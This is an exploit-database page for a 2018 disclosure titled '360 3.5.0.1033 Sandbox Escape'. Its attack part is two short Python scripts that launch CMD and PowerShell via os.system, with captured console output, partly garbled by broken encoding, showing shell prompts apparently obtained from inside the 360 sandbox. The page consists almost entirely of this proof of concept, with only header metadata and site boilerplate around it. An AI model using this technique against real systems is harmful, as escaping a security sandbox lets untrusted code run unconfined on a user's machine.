360 3.5.0.1033 Sandbox Escape

2018.10.09
Credit: vr_system
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: 360 3.5.0.1033 - Sandbox Escape # Date: 2018-10-08 # Exploit Author: vr_system # Vendor Homepage: https://www.360.cn/ # Software Link: https://dl.360safe.com/360/inst.exe # Version: 3.5.0.1033 # Tested on: 3.5.0.1033 # CVE : None # 1aCMD_test.py import os os.system("CMD") # 2aPowerShell_test.py import os os.system("PowerShell") # 3a # Running CMD_test.py in sandboxi1/4 Microsoft Windows [cae! 10.0.17134.254] (c) 2018 Microsoft Corporationaa?caeaeaea(c)a C:\Python27> # Running PowerShell_test.py in sandboxi1/4 Windows PowerShell caeaeae (C) Microsoft Corporationaa?caeaeaea(c)a PS C:\Python27>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top